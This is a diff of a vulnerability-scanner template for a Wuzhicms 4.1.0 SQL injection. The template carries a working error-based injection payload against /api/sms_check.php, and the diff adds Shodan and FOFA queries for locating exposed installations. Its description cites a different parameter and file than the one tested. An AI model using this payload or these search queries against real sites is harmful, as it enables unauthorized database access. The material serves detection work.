vulnerabilities/other/wuzhicms-sqli.yaml (before)
id: wuzhicms-sqli

info:
  name: Wuzhicms 4.1.0 - SQL Injection
  author: princechaddha
  severity: critical
  description: Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/wuzhicms/wuzhicms/issues/184
    - https://vulners.com/cnvd/CNVD-2022-36985
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  tags: wuzhicms,sqli

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'

      - type: status
        status:
          - 200

vulnerabilities/other/wuzhicms-sqli.yaml (after)
id: wuzhicms-sqli

info:
  name: Wuzhicms 4.1.0 - SQL Injection
  author: princechaddha
  severity: critical
  description: |
    Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/wuzhicms/wuzhicms/issues/184
    - https://vulners.com/cnvd/CNVD-2022-36985
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  metadata:
    verified: true
    shodan-query: http.html:"Wuzhicms"
    fofa-query: title="Wuzhicms"
  tags: wuzhicms,sqli

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c8c605999f3d8352d7bb792cf3fdb25'

      - type: status
        status:
          - 200

vulnerabilities/other/wuzhicms-sqli.yaml (diff)
@@ -4,7 +4,8 @@ info:
   name: Wuzhicms 4.1.0 - SQL Injection
   author: princechaddha
   severity: critical
-  description: Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  description: |
+    Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
   reference:
     - https://github.com/wuzhicms/wuzhicms/issues/184
     - https://vulners.com/cnvd/CNVD-2022-36985
@@ -12,6 +13,10 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
     cwe-id: CWE-89
+  metadata:
+    verified: true
+    shodan-query: http.html:"Wuzhicms"
+    fofa-query: title="Wuzhicms"
   tags: wuzhicms,sqli
 
 variables:
